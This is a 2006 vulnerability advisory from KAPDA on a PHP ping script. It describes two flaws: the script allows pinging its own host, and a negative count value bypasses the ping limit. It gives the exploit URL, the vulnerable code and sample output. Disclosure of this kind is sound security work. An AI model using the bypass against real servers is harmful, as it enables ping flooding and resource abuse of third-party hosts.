[KAPDA::#23] - The WorldsEnd.NET - Free Ping Script, written in PHP (2 vulns) KAPDA New advisory Vulnerable products : The WorldsEnd.NET - Free Ping Script Vendor: http://www.theworldsend.net/ Risk: Low Vulnerabilities: Restriction Bypass Date : -------------------- Found : Aug 2005 Vendor Contacted : N/A Release Date : Jan 2006 About The WorldsEnd.NET - Free Ping Script : -------------------- A simple php script for sending pings to remote hosts. This script has a bad reputation because of a previous remote command execution bug. Vulnerability: -------------------- Vuln 1: the script allows to ping the server it is hosted on. 127.0.0.1 Vuln 2: the scripts only allows you to send 10 or 4 pings Just look at the count value in the url http://victim/ping.php?host=127.0.0.1&coun...&submit=Ping%21 Maximum for count is: 10 But because of a signed/unsigned integer overflow (script -> ping) and an extra programming error we can bypass that restriction. Exploit: -------------------- You can bypass the ping count restriction by just making the count value negative. http://victim/ping.php?host=127.0.0.1&coun...&submit=Ping%21 This will bypass the restriction and allows you to send any amount of pings. Just look at this code snippet from the script // over count ? If ($count > $max_count) <== HERE IS THE MISTAKE, IT DOENS'NT CHECK FOR NEGATIVE NUMBERS { echo 'Maximum for count is: '.$max_count; echo '<a href="'.$self.'">Back</a>'; } else { // replace bad chars $host= preg_replace ("/[^A-Za-z0-9.]/","",$host); <== HERE IS THE FIX FOR THE REMOTE CODE EXECUTION BUG echo '<body bgcolor="#FFFFFF" text="#000000"></body>'; echo("Ping Output:<br>"); echo '<pre>'; Ping Output: Pinging 127.0.0.1 with 32 bytes of data: Reply from 127.0.0.1: bytes=32 time<10ms TTL=128 Reply from 127.0.0.1: bytes=32 time<10ms TTL=128 Reply from 127.0.0.1: bytes=32 time<10ms TTL=128 Reply from 127.0.0.1: bytes=32 time<10ms TTL=128 Reply from 127.0.0.1: bytes=32 time<10ms TTL=128 Reply from 127.0.0.1: bytes=32 time<10ms TTL=128 Reply from 127.0.0.1: bytes=32 time<10ms TTL=128 Reply from 127.0.0.1: bytes=32 time<10ms TTL=128 Reply from 127.0.0.1: bytes=32 time<10ms TTL=128 Reply from 127.0.0.1: bytes=32 time<10ms TTL=128 Reply from 127.0.0.1: bytes=32 time<10ms TTL=128 Reply from 127.0.0.1: bytes=32 time<10ms TTL=128 Reply from 127.0.0.1: bytes=32 time<10ms TTL=128 Reply from 127.0.0.1: bytes=32 time<10ms TTL=128 Reply from 127.0.0.1: bytes=32 time<10ms TTL=128 Reply from 127.0.0.1: bytes=32 time<10ms TTL=128 Reply from 127.0.0.1: bytes=32 time<10ms TTL=128 Reply from 127.0.0.1: bytes=32 time<10ms TTL=128 Reply from 127.0.0.1: bytes=32 time<10ms TTL=128 Reply from 127.0.0.1: bytes=32 time<10ms TTL=128 Reply from 127.0.0.1: bytes=32 time<10ms TTL=128 Reply from 127.0.0.1: bytes=32 time<10ms TTL=128 Reply from 127.0.0.1: bytes=32 time<10ms TTL=128 Reply from 127.0.0.1: bytes=32 time<10ms TTL=128 Reply from 127.0.0.1: bytes=32 time<10ms TTL=128 Reply from 127.0.0.1: bytes=32 time<10ms TTL=128 Reply from 127.0.0.1: bytes=32 time<10ms TTL=128 Reply from 127.0.0.1: bytes=32 time<10ms TTL=128 Reply from 127.0.0.1: bytes=32 time<10ms TTL=128 Reply from 127.0.0.1: bytes=32 time<10ms TTL=128 Reply from 127.0.0.1: bytes=32 time<10ms TTL=128 Reply from 127.0.0.1: bytes=32 time<10ms TTL=128 Reply from 127.0.0.1: bytes=32 time<10ms TTL=128 Reply from 127.0.0.1: bytes=32 time<10ms TTL=128 Reply from 127.0.0.1: bytes=32 time<10ms TTL=128 Reply from 127.0.0.1: bytes=32 time<10ms TTL=128 Reply from 127.0.0.1: bytes=32 time<10ms TTL=128 Reply from 127.0.0.1: bytes=32 time<10ms TTL=128 Reply from 127.0.0.1: bytes=32 time<10ms TTL=128 Reply from 127.0.0.1: bytes=32 time<10ms TTL=128 Reply from 127.0.0.1: bytes=32 time<10ms TTL=128 Reply from 127.0.0.1: bytes=32 time<10ms TTL=128 Reply from 127.0.0.1: bytes=32 time<10ms TTL=128 Reply from 127.0.0.1: bytes=32 time<10ms TTL=128 Reply from 127.0.0.1: bytes=32 time<10ms TTL=128 Reply from 127.0.0.1: bytes=32 time<10ms TTL=128 Reply from 127.0.0.1: bytes=32 time<10ms TTL=128 Reply from 127.0.0.1: bytes=32 time<10ms TTL=128 Reply from 127.0.0.1: bytes=32 time<10ms TTL=128 Reply from 127.0.0.1: bytes=32 time<10ms TTL=128 Ping statistics for 127.0.0.1: Packets: Sent = 50, Received = 50, Lost = 0 (0% loss), Approximate round trip times in milli-seconds: Minimum = 0ms, Maximum = 0ms, Average = 0ms Solution: -------------------- No patch or fix exits Original Advisory: -------------------- http://www.kapda.ir/advisory-231.html Credit : -------------------- Discoverd by cvh [at} kapda.ir Grtz to all members of KAPDA and GSO. KAPDA - Computer Security Researchers Institute http://www.KAPDA.ir
